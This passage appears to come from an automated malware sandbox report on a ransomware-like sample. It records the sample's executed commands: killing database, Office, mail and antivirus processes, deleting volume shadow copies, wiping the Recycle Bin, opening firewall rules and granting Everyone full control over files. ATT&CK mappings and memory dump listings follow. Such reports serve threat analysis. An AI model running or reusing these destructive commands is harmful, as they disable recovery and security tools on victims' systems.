  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1964
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:64
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1800
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:336
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:2168
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:2228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3328
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:808
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2416
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2716
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1364
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1404
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1828
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3992
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3580
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2168
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:808
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1204
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:2624
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3928
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3852
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:3468
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3176
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3456
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2812
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:828
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1028
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2492
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3408
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2500
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3444
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3680
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3480
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2940
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:2188
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\RepairPush.mov /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1092
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\WatchOpen.ps1 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3496
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2820
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3724
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3948
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2416

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/668-148-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download
memory/668-123-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download
memory/668-124-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download
memory/668-177-0x00000000095A0000-0x00000000095A1000-memory.dmp

Filesize
4KB

Download
memory/668-189-0x0000000007023000-0x0000000007024000-memory.dmp

Filesize
4KB

Download
memory/668-130-0x0000000007020000-0x0000000007021000-memory.dmp

Filesize
4KB

Download
memory/668-132-0x0000000007022000-0x0000000007023000-memory.dmp

Filesize
4KB

Download
memory/668-167-0x000000007F0D0000-0x000000007F0D1000-memory.dmp

Filesize
4KB

Download
memory/668-133-0x0000000007D40000-0x0000000007D41000-memory.dmp

Filesize
4KB

Download
memory/668-141-0x0000000007F40000-0x0000000007F41000-memory.dmp

Filesize
4KB

Download
memory/2748-117-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/2748-115-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/2748-118-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/3444-686-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/3444-687-0x0000000005032000-0x0000000005033000-memory.dmp

Filesize
4KB

Download
memory/3444-708-0x0000000005034000-0x0000000005036000-memory.dmp

Filesize
8KB

Download
memory/3444-707-0x0000000005033000-0x0000000005034000-memory.dmp

Filesize
4KB

Download
memory/3548-140-0x0000000007870000-0x0000000007871000-memory.dmp

Filesize
4KB

Download
memory/3548-122-0x0000000004300000-0x0000000004301000-memory.dmp

Filesize
4KB

Download
memory/3548-143-0x0000000007C40000-0x0000000007C41000-memory.dmp

Filesize
4KB

Download
memory/3548-190-0x0000000004463000-0x0000000004464000-memory.dmp

Filesize
4KB

Download
memory/3548-135-0x0000000007540000-0x0000000007541000-memory.dmp

Filesize
4KB

Download
memory/3548-145-0x0000000007F10000-0x0000000007F11000-memory.dmp

Filesize
4KB

Download
memory/3548-187-0x0000000008E20000-0x0000000008E21000-memory.dmp

Filesize
4KB

Download
memory/3548-131-0x0000000004462000-0x0000000004463000-memory.dmp

Filesize
4KB

Download
memory/3548-129-0x0000000004460000-0x0000000004461000-memory.dmp

Filesize
4KB

Download
memory/3548-127-0x0000000006E40000-0x0000000006E41000-memory.dmp

Filesize
4KB

Download
memory/3548-164-0x000000007EE70000-0x000000007EE71000-memory.dmp

Filesize
4KB

Download
memory/3548-162-0x0000000008CD0000-0x0000000008D03000-memory.dmp

Filesize
204KB

Download
memory/3548-125-0x0000000004410000-0x0000000004411000-memory.dmp

Filesize
4KB

Download
memory/3548-147-0x0000000004300000-0x0000000004301000-memory.dmp

Filesize
4KB

Download
memory/3548-121-0x0000000004300000-0x0000000004301000-memory.dmp

Filesize
4KB

Download